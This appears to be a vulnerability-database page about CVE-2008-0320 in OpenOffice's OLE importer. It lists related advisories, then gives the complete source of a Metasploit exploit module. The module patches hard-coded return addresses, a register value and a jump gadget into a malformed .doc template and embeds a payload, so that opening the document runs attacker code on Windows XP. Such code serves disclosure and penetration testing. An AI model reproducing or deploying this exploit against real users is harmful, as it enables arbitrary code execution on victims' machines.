| Reporter | Title | Published | Views | Family All 88 |
|---|---|---|---|---|
| OpenOffice OLE Importer DocumentSummaryInformation Stream Handling | 24 May 201200:00 | – | zdt | |
| OpenOffice < 2.4 Multiple Vulnerabilities | 17 Apr 200800:00 | – | nessus | |
| CentOS 4 / 5 : openoffice.org / openoffice.org2 (CESA-2008:0175) | 22 Apr 200800:00 | – | nessus | |
| CentOS 3 / 4 : openoffice.org (CESA-2008:0176) | 22 Apr 200800:00 | – | nessus | |
| Debian DSA-1547-1 : openoffice.org - several vulnerabilities | 18 Apr 200800:00 | – | nessus | |
| Fedora 8 : openoffice.org-2.3.0-6.14.fc8 (2008-3251) | 25 Apr 200800:00 | – | nessus | |
| Fedora 7 : openoffice.org-2.3.0-6.8.fc7 (2008-4104) | 20 May 200800:00 | – | nessus | |
| GLSA-200805-16 : OpenOffice.org: Multiple vulnerabilities | 16 May 200800:00 | – | nessus | |
| Mandriva Linux Security Advisory : openoffice.org (MDVSA-2008:095) | 23 Apr 200900:00 | – | nessus | |
| Sun OpenOffice.org < 2.4 Multiple Vulnerabilities | 17 Apr 200800:00 | – | nessus |
`##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",
'Description' => %q{
This module exploits a vulnerability in OpenOffice 2.3.1 and 2.3.0 on
Microsoft Windows XP SP3.
By supplying a OLE file with a malformed DocumentSummaryInformation stream, an
attacker can gain control of the execution flow, which results arbitrary code
execution under the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Marsu <Marsupilamipowa[at]hotmail.fr>', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2008-0320'],
['OSVDB', '44472'],
['BID', '28819'],
['EDB', '5584'],
['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=694']
],
'Payload' =>
{
'Space' => 407
},
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true'
},
'Platform' => 'win',
'Targets' =>
[
[
'OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3',
{
'Ret' => 0x609345fe, # add esp, ebx # ... # ret from tl680mi
'EBX' => 0xffffefa8, # EBX value
'JmpEsp' => 0x60915cbd, # push esp # ret from tl680mi
}
],
],
'Privileged' => false,
'DisclosureDate' => "Apr 17 2008",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The filename', 'msf.doc'])
], self.class)
end
def exploit
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2008-0320.doc')
f = File.open(path, 'rb')
template = f.read
f.close
my_payload = payload.encoded
template[115717, 4] = [target['Ret']].pack("V")
template[115725, 4] = [target['EBX']].pack("V")
template[115729, 4] = [target['JmpEsp']].pack("V")
template[115808, my_payload.length] = my_payload
file_create(template)
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation